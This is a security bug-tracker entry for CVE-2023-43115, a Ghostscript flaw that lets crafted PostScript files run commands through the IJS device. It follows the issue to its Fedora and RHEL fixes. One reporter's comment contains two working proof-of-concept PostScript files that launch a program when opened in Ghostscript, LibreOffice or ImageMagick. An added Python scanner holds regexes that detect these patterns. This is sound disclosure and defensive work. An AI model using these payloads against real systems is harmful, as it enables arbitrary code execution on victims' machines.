Bug 2241108 (CVE-2023-43115)

Summary: CVE-2023-43115 Ghostscript: GhostPDL can lead to remote code execution via crafted PostScript documents
Product: [Other] Security Response
Reporter: Dhananjay Arunesh <darunesh>
Component: vulnerability
Assignee: Product Security <prodsec-ir-bot>
Status: NEW ---
QA Contact:
Severity: high
Docs Contact:
Priority: high
Version: unspecified
CC: alexander.neumann, bmason, daniel, pdwyer, xili
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
A vulnerability was found in Artifex Ghostscript in gdevijs.c that allows a malicious remote attacker to perform remote code execution via crafted PostScript documents.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 2241112
Bug Blocks: 2241109

Description Dhananjay Arunesh 2023-09-28 06:36:11 UTC
In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated.

References:
https://bugs.ghostscript.com/show_bug.cgi?id=707051
https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5
https://ghostscript.com/

Comment 1 Dhananjay Arunesh 2023-09-28 06:43:03 UTC
Created ghostscript tracking bugs for this issue:

Affects: fedora-all [bug 2241112]

Comment 3 Alexander Neumann 2023-10-10 14:30:04 UTC
So, what's the current status regarding this vulnerability?

This is highly critical: at the moment, on a fully updated Fedora 38, attackers can execute arbitrary commands when users open/use PostScript files.

In the following, I'll describe two ways to exploit this (and start gnome-calculator as an example):

1. Run `gs calc.ps` with the following file (or insert it as an image in LibreOffice):

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox:   36   36  576  756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog

<< /OutputDevice /ijs /IjsServer (gnome-calculator) >> setpagedevice
------------------

2. Via ImageMagick: run `convert calc-convert.ps calc-convert.png`:

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox:   36   36  576  756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog

% this is somehow needed to not get a null pointer dereference (will basically initialize the ijs device a bit, and then complain about unset IjsServer):
{
(ijs) finddevice setdevice
} stopped {} {} ifelse
pop

% set ijserver to payload
{
mark /IjsServer (/usr/bin/gnome-calculator) (ijs) finddevice putdeviceprops setdevice
} stopped {} {} ifelse
pop
------------------

What's the plan here? :)
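
A static triage check for the two routes to the IJS device shown in the description and in the files above (selecting ijs via setpagedevice or finddevice, and setting IjsServer), added here as an example; it is not part of the bug report, of Ghostscript or of Fedora, and the indicator regexes and sample inputs are constructed assumptions.

```python
"""Static triage of PostScript input for attempts to reach Ghostscript's IJS device
(the CVE-2023-43115 pattern). Added example: indicators and samples are constructed."""
import re
# One regex per route shown in the report: selecting the ijs device through
# setpagedevice or finddevice, or touching the IjsServer parameter.
INDICATORS = {
    "ijs_output_device": re.compile(r"/OutputDevice\s*/ijs\b"),
    "ijs_finddevice": re.compile(r"\(ijs\)\s*finddevice"),
    "ijsserver_param": re.compile(r"/IjsServer\b"),
}

def strip_comments(ps_text: str) -> str:
    """Drop '%' comments (DSC headers included) so they can neither hide an
    indicator nor trigger a false positive; '%' inside (...) strings is kept."""
    out, depth, i = [], 0, 0
    while i < len(ps_text):
        c = ps_text[i]
        if depth == 0 and c == "%":
            nl = ps_text.find("\n", i)      # skip to end of line, keep the newline
            i = len(ps_text) if nl == -1 else nl
            continue
        if depth > 0 and c == "\\":
            out.append(ps_text[i:i + 2])    # escaped char inside a string literal
            i += 2
            continue
        if c == "(":
            depth += 1
        elif c == ")" and depth > 0:
            depth -= 1
        out.append(c)
        i += 1
    return "".join(out)

def scan_postscript(ps_text: str) -> list[str]:
    """Names of the indicators present in executable (non-comment) text."""
    code = strip_comments(ps_text)
    return [name for name, rx in INDICATORS.items() if rx.search(code)]

# Constructed samples: a harmless EPS that mentions IjsServer only in a comment,
# and the two minimal forms of the device switch described in the report.
BENIGN_EPS = ("%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n"
              "% reviewer note: /IjsServer appears only in this comment\n"
              "0 0 50 50 rectfill showpage\n")
SETPAGEDEVICE_PS = "%!PS\n<< /OutputDevice /ijs /IjsServer (ijs-server) >> setpagedevice\n"
FINDDEVICE_PS = "%!PS\n{ (ijs) finddevice setdevice } stopped pop\n"

if __name__ == "__main__":
    for sample in (BENIGN_EPS, SETPAGEDEVICE_PS, FINDDEVICE_PS):
        print(scan_postscript(sample) or "clean")
```

This is a pre-filter for upload or conversion pipelines, not a substitute for the upstream fix linked in the description: PostScript can build names and operators at run time, so a static pattern match only catches the straightforward forms.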

Comment 4 Alexander Neumann 2023-10-12 08:49:24 UTC
Just to be clear: opening a LibreOffice document is enough to trigger the RCE: we've made a video here: https://twitter.com/RedTeamPT/status/1712379361146318896

Here's a video which shows the exploit for convert: https://twitter.com/RedTeamPT/status/1712379364136964411

Comment 5 Daniel Milnes 2023-10-13 22:25:58 UTC
(In reply to Alexander Neumann from comment #4)
> Just to be clear: opening a LibreOffice document is enough to trigger the
> RCE: we've made a video here:
> https://twitter.com/RedTeamPT/status/1712379361146318896
> 
> Here's a video which shows the exploit for convert:
> https://twitter.com/RedTeamPT/status/1712379364136964411

Hey Alexander, thanks for flagging that this had been missed.

Updates to supported versions of Fedora (38: https://bodhi.fedoraproject.org/updates/FEDORA-2023-66d60c3df7, 39: https://bodhi.fedoraproject.org/updates/FEDORA-2023-c2665a9ff3) have been submitted, and will roll out once they have enough upvotes or time passes.

I've also proposed this as a Final Release Blocker for Fedora 39, so it should be fixed from day one there (https://pagure.io/fedora-qa/blocker-review/issue/1408).

Comment 6 Alexander Neumann 2023-10-16 06:56:39 UTC
Cool, thanks for the feedback! We really appreciate your work!

Comment 7 errata-xmlrpc 2023-10-18 22:54:26 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9.0 Extended Update Support

Via RHSA-2023:5868 https://access.redhat.com/errata/RHSA-2023:5868

Comment 8 errata-xmlrpc 2023-11-02 09:31:26 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2023:6265 https://access.redhat.com/errata/RHSA-2023:6265

Comment 9 errata-xmlrpc 2023-11-07 10:07:23 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2023:6732 https://access.redhat.com/errata/RHSA-2023:6732